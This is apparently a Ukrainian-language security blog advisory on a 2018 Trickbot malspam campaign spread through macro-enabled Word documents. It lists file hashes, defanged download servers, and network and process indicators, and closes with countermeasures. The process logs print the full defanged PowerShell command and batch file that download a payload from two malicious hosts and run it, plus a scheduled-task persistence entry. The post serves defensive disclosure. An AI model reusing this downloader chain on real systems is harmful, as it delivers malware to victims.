IOC_trickbot_280318

Доброго дня, панове.

Вчора проходила розсилка шкідливого коду типу #trickbot (розглядали в минулому році)

На відміну від попередніх розсилок тут і тут, цього разу – документи із макросами.

Рівень загрози (для організацій які досі не заблокували макроси) – середній.

Для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Макрос містить чітко вказане ім’я payload та два різні сервери завантаження
  • Основне тіло завантажується як зображення, хоча є некодованим додатком
  • Одразу після запуску перевіряє Public IP
  • Зупинка процесу призводить до перезапуску payload
  • Повторний запуск (інфікування) генерують нове ім’я payload проте шлях незмінний

Схема атаки:

email > Attach (.doc(x)) > Winword > cmd > Powershell > 
2 hardcoded URL >  $env:temp + '\ kizsgkv.exe

#1 Завантаження основного тіла:


#2 Закріплення в системі:


#3 Повторний запуск основного тіла


Маркери IOC:

документ приманка:

SHA-256        3782f96c6d9f3136651da208465fa939313b7e4f21bdc4ef10c05926e0428a65
File name   SecureMessage.doc
File size      62 KB

основна частина (джерела станом на 29те вже не працюють):

SHA-256    2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c
File name   svoren.png >> \Temp\kizsgkv.exe
File size      392 KB

Мережеві IOC:

завантаження payload – вже не дійсні

202.218.252.73   m-tensou{.} net  GET /svoren.png HTTP/1.1
202.169.44.149   interbanx{.} co.id        GET /svoren.png HTTP/1.1

трафік скомпрометованої системи

54.84.104.112    checkip.amazonaws{.}com   GET / HTTP/1.1   Mozilla/5.0
82.146.60.85      49642 → https(443) [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1  

Активність по процесам:

Відкриття документу призводить до активації макросу, який у свою чергу ініціює завантаження основної частини засобами Powershell

"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).DownloadFile($Mvurccbh,''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'');Start-Process ''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'';}try{Bcnfqi(''h11p:\m-tensou{.} net/svoren.png'')}catch{Bcnfqi(''h11p:\interbanx{.} co.id/svoren.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat;Start-Process 'C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat' -WindowStyle Hidden"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell  "'PowerShell ""function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).DownloadFile($Mvurccbh,''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'');Start-Process ''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'';}try{Bcnfqi(''h11p:\m-tensou{.} net/svoren.png'')}catch{Bcnfqi(''h11p:\interbanx{.} co.id/svoren.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat;Start-Process 'C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe cmd /c ""C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell  "function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).DownloadFile($Mvurccbh,'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe');Start-Process 'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe';}try{Bcnfqi('h11p:\m-tensou{.} net/svoren.png')}catch{Bcnfqi('h11p:\interbanx{.} co.id/svoren.png')}

Зміст .bat файлу

Vxxhpfqnsmql.bat
PowerShell "function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).
DownloadFile($Mvurccbh,'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe');
Start-Process 'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe';}
try{Bcnfqi('h11p:\m-tensou{.} net/svoren.png')}
catch{Bcnfqi('h11p:\interbanx{.} co.id/svoren.png')}

 Закріплення через планувальник задач

\MsNetMonitor                    c:\users\operator\appdata\roaming\netviewer\kiztgkv.exe  9/11/2016 7:57 AM   

 Відновлення в разі зупинки процесу

"C:\Users\operator\AppData\Local\Temp\kizsgkv.exe"
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe
C:\Windows\system32\svchost.exe -k netsvcs
taskeng.exe {DF877B3F-E8C0-424D-AF5E-43A877CA9BCB} S-1-5-21-2867606665-3356615968-442145759-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe
taskeng.exe {1E8FF255-2D23-4815-9E0C-10E2B16FF7A8} S-1-5-21-2867606665-3356615968-442145759-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe

Контрзаходи:

  • Якщо для роботи макроси не є потрібними – деактивуйте їх (реєстр, GPO, параметри MS Office)
  • Заборона запуску дочірніх процесів для додатків MS Office (cmd, PowerShell etc)
  • Блокування доступу до мережі Інтернет для процесу PowerShell (варіант 1й) + cmd, + winword.exe (про всяк випадок)
  • Якщо ж PowerShell активно застосовується – нагадую про вбудовані можливості McAfee ENS – сигнатури Exploit Prevention
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю C:\Users\**\ !
  • Заборона виклику PowerShell через CMD
  • Контроль передачі запускних файлів по каналам Web та Email
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Tags: , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: